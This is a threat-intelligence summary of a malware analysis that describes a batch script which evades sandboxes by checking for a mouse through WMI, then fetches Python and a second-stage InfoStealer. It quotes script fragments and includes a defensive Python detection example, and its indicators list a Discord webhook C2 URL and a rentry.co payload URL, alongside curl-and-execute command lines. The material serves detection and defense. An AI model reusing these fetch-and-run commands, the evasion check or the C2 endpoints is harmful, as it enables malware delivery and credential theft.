Malware samples increasingly use anti-sandbox checks to determine whether they run on a real machine, such as querying hardware with WMI for a connected mouse. If the check fails, the sample downloads a minimal Python environment and a second-stage InfoStealer that uses an obfuscated Discord webhook as its C2. #InfoStealer #Discord
Keypoints
- Malware performs a sandbox/virtualization check by querying hardware via WMI to see if a mouse is connected.
- The check: if no mouse is detected, the sample exits or proceeds with sandbox-evading actions.
- Upon passing the check, the malware downloads a minimal Python environment to support subsequent stages.
- It then downloads and executes a second stage (InfoStealer) and uses an obfuscated Discord webhook as its C2 channel.
- The sample is identified by the SHA-256 hash 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb and has been noted in VirusTotal detections.
- The analysis highlights how simple batch scripts and WMIC/WMI can be leveraged for anti-sandbox behavior and staged payload delivery.
MITRE Techniques
- [T1047] Windows Management Instrumentation – The script queries the hardware through the WMI client and filters the results for devices of interest. ‘The script uses the WMI (“Windows Management Instrumentation”) client to query the hardware and filter interesting devices.’
- [T1497] Virtualization/Sandbox Evasion – The malware checks for a sandbox by detecting whether a mouse is present; ‘Indeed some basic sandboxes do not have a mouse connected to them.’
- [T1059.003] Windows Command Shell – The sample is implemented as a Windows batch script performing hardware checks and control flow. ‘set "mouseConnected=false" for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do ( set "mouseConnected=true" ) …’
- [T1105] Ingress Tool Transfer – Downloads a minimal Python environment when no mouse is detected. ‘If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:’
- [T1105] Ingress Tool Transfer – Downloads the second stage from a remote URL and runs it with Python. ‘set "ENCODED_URL=…"; curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure … python -m %OUTPUT_FILE% …’
- [T1071.001] Web Protocols – Uses a Discord webhook as a C2 channel. ‘the Discord channel used as C2 is obfuscated.’
- [T1027] Obfuscated/Compressed Files and Information – The C2 channel and payloads are obfuscated to hinder analysis. ‘…obfuscated…’
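The staging chain quoted in the bullets above (WMIC mouse probe, curl fetch of a Python installer, `--insecure` download, `python -m` execution) is easiest to catch by correlating process-creation events per parent process rather than alerting on any single command. The detection logic below is an added example, not code from the ISC diary or the sample; it assumes Sysmon Event ID 1-style records reduced to (parent_pid, pid, command_line) tuples, and the sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Each stage of the chain, as a case-insensitive pattern over the command line.
STAGE_PATTERNS = [
    ("wmi_mouse_probe", re.compile(r"wmic\s+path\s+Win32_PointingDevice", re.I)),
    ("python_fetch", re.compile(r"curl\b.*python-3\.\d+\.\d+\S*\.exe", re.I)),
    ("insecure_download", re.compile(r"curl\b.*(?:--insecure|\s-k\b)", re.I)),
    ("python_module_exec", re.compile(r"python(?:\.exe)?\s+-m\s+\S+", re.I)),
]

# Constructed sample events (parent_pid, pid, command line); pid 5012 is the batch
# script's cmd.exe, pid 7000 is a benign inventory script that only runs the WMI query.
SAMPLE_EVENTS = [
    (4400, 5012, 'C:\\Windows\\System32\\cmd.exe /c "C:\\Users\\u\\Downloads\\update.bat"'),
    (5012, 5020, "wmic path Win32_PointingDevice get PNPDeviceID /value"),
    (5012, 5031, "curl -o python-3.10.0rc2-amd64.exe -s "
                 "https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"),
    (5012, 5044, "curl -o webpage.py -s https://rentry.co/zph33gvz/raw --insecure"),
    (5012, 5050, "python -m webpage.py"),
    (7000, 7001, "wmic path Win32_PointingDevice get PNPDeviceID /value"),
]


def score_chains(events, min_stages=3):
    """Group child command lines by parent pid and report parents whose children
    hit at least `min_stages` distinct stages, with the WMI mouse probe required
    so a lone inventory query does not alert on its own."""
    stages_by_parent = defaultdict(set)
    for parent_pid, _pid, cmdline in events:
        for name, pattern in STAGE_PATTERNS:
            if pattern.search(cmdline):
                stages_by_parent[parent_pid].add(name)
    alerts = {}
    for parent_pid, stages in stages_by_parent.items():
        if "wmi_mouse_probe" in stages and len(stages) >= min_stages:
            alerts[parent_pid] = sorted(stages)
    return alerts


if __name__ == "__main__":
    for parent_pid, stages in score_chains(SAMPLE_EVENTS).items():
        print(f"parent pid {parent_pid}: staged anti-sandbox chain {stages}")
```

In a real deployment the tuples would come from Sysmon or EDR process telemetry, and the same per-parent grouping lets the `min_stages` threshold be tuned against environments where WMI hardware inventory is routine.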
Indicators of Compromise
- [File hash] 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb – Sample hash identified for the malware payload used in the article
- [URL] https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe – Download URL for the minimal Python environment
- [URL] https://discord.com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_ – Discord webhook used as a C2 channel
- [URL] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection – VirusTotal detection page for the sample
- [URL] https://rentry.co/zph33gvz/raw – Encoded URL used for the second stage in the pipeline
- [File name] webpage.py – Name of the downloaded Python-based component executed in the second stage
- [Domain] discord.com – Domain used by the C2 channel (Discord webhook)
- [Domain] rentry.co – Domain involved in hosting the encoded URL for the second stage
Read more: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/